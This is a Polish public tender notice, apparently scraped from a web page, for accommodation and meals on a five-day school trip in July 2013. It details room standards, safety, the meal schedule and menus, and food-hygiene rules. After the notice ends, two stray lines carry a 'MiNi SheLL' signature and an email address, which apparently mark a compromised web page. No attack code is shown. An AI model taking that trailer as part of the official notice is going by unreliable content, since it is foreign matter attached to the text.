Budynek, w którym zostanie zakwaterowana grupa wycieczkowa nie może być w trakcie prac remontowo-budowlanych przez cały okres trwania usługi. 
Standard zakwaterowania: hotel minimum dwugwiazdkowy z basenem.
Pokoje: 1, 2-osobowe. W każdym pokoju łazienka z pełnym węzłem sanitarnym (toaleta, umywalka, prysznic lub wanna), telewizor TV SAT i dostęp do Internetu oraz szafa z półkami i wieszakami (odpowiednia gabarytowo do ilości zakwaterowanych) i szafki nocne przy łóżkach. Całodobowy dostęp do ciepłej i zimnej wody.
Pokoje z łóżkami jednoosobowymi wraz z pościelą.
Wykonawca musi zapewnić podział pomieszczeń ze względu na płeć. 
Pokoje czyste, sprzęt niewyeksploatowany. 
Cena zakwaterowania winna obejmować opłatę klimatyczną (jeżeli dotyczy), codzienne korzystanie z basenu, bilard.
Obiekt noclegowy musi zapewnić parking dla autokaru, cena parkingu w cenie usługi.
Zakwaterowanie musi się odbywać w obiekcie spełniającym warunki bezpieczeństwa - obiekt, w którym ma być zorganizowany pobyt musi spełniać wymogi dotyczące bezpieczeństwa, ochrony przeciwpożarowej, warunków higieniczno - sanitarnych oraz ochrony środowiska określonych przepisami o ochronie przeciwpożarowej, państwowej Inspekcji Sanitarnej i ochronie środowiska. 
W celu zapewnienia bezpieczeństwa uczestników wycieczki budynek noclegowy powinien być tak zabezpieczony aby uniemożliwić wejście -wyjście po godzinie 22.00 (np. recepcja).
Zamawiający wymaga, aby Wykonawca załączył do oferty szczegółowy opis miejsca wykonywania zamówienia i warunków zakwaterowania wraz z dokumentacją zdjęciową. 
Wyżywienie: 
Planowana ilość osób do wyżywienia: 27 (24 uczniów + 3 os. dorosłe). Zamawiający zastrzega możliwość dokonania zmian ilościowych.
Wykonawca w ramach świadczonej usługi zobowiązany jest do zapewnienia wyżywienia wg harmonogramu:
1 dzień (15.07.2013r.) - dzień przyjazdu: obiadokolacja
2 dzień (16.07.2013r.) - śniadanie, obiadokolacja
3 dzień (17.07.2013r.) -  śniadanie, obiadokolacja
4 dzień (18.07.2013r.) -  śniadanie, obiadokolacja, biesiada grillowa
5 dzień - dzień powrotu (19.07.2013r.) - śniadanie, obiad.
Planowana łączna liczba posiłków podczas realizacji usługi (podane ilości są ilościami szacunkowymi, zamawiający zastrzega możliwość zmian ilości posiłków):
4 śniadania w formie szwedzkiego stołu (przykładowe śniadanie: jajecznica na maśle, jajka sadzone, parówki na gorąco, półmisek sera, sery topione, półmisek wędlin, jajko w majonezie, twarożek ze szczypiorkiem, pasta jajeczna, jogurt, płatki kukurydziane, mleko, masło, dżem, miód porcjowane, świeże pieczywo mieszane, soki, woda mineralna, kawa, herbata  (1 śniadanie obejmuje wszystkich uczestników wycieczki - 27 osób); 
1 obiad + 4 obiadokolacje: dwa dania (zupa w wazach + drugie danie, np. ziemniaki lub frytki, kasza gryczana, kluski lub makaron (do wyboru) surówka z warzyw świeżych, porcja mięsa: kotlet schabowy, gulasz, ryba smażona (filet), filet z kurczaka) + napój (woda, sok) + deser + herbata i kawa (1 posiłek obejmuje wszystkich uczestników wycieczki - 27 osób);
1 biesiada grillowa (1 posiłek obejmuje wszystkich uczestników wycieczki - 27 osób);
Uczestnicy przez cały pobyt muszą mieć dostęp do wody mineralnej.
Świadczenie usługi winno się odbywać w miejscu zakwaterowania i w miejscu do tego przystosowanym np. restauracja. 
Posiłki podczas całego pobytu winny być zróżnicowane, nie dopuszcza się powtarzalność tej samej potrawy. W całodziennym jadłospisie powinny zostać uwzględnione produkty ze wszystkich grup spożywczych.
Posiłki mają być sporządzane zgodnie z wymogami sztuki kulinarnej i sanitarnej dla żywienia zbiorowego. Muszą być wykonywane w dniu dostawy ze świeżych artykułów spożywczych posiadających aktualne daty ważności. Czas pomiędzy przygotowaniem posiłków, a jego spożyciem nie powinien być dłuższy niż 2 godziny.
Wartość kaloryczna całodniowego posiłku musi być zgodna z zasadami żywienia. 
Wszelkie posiłki powinny być przygotowane zgodnie z obowiązującymi normami żywieniowymi wg Instytutu Żywienia i Żywności, jak również przepisami prawa w zakresie higieny żywienia norm HCCAP. Wykonawca musi posiadać pozytywną opinię pokontrolną Sanepid oraz mieć wdrożony HACCP.
Miejsce w którym będą podawane posiłki musi być przystosowane do żywienia zbiorowego dzieci i młodzieży. 
Wykonawca będzie zobowiązany do pobierania i przechowywania próbek wszystkich potraw wchodzących w skład każdego posiłku zgodnie z Rozporządzeniem Ministra Zdrowia z dnia 17.04.2007r. w sprawie pobierania i przechowywania próbek żywności przez zakłady żywienia zbiorowego typu zamkniętego (Dz. U. z 2007, Nr 80, poz. 545).
Wykonawca dostarczy zestawienie potwierdzające ilość dostarczonych posiłków..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.27.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com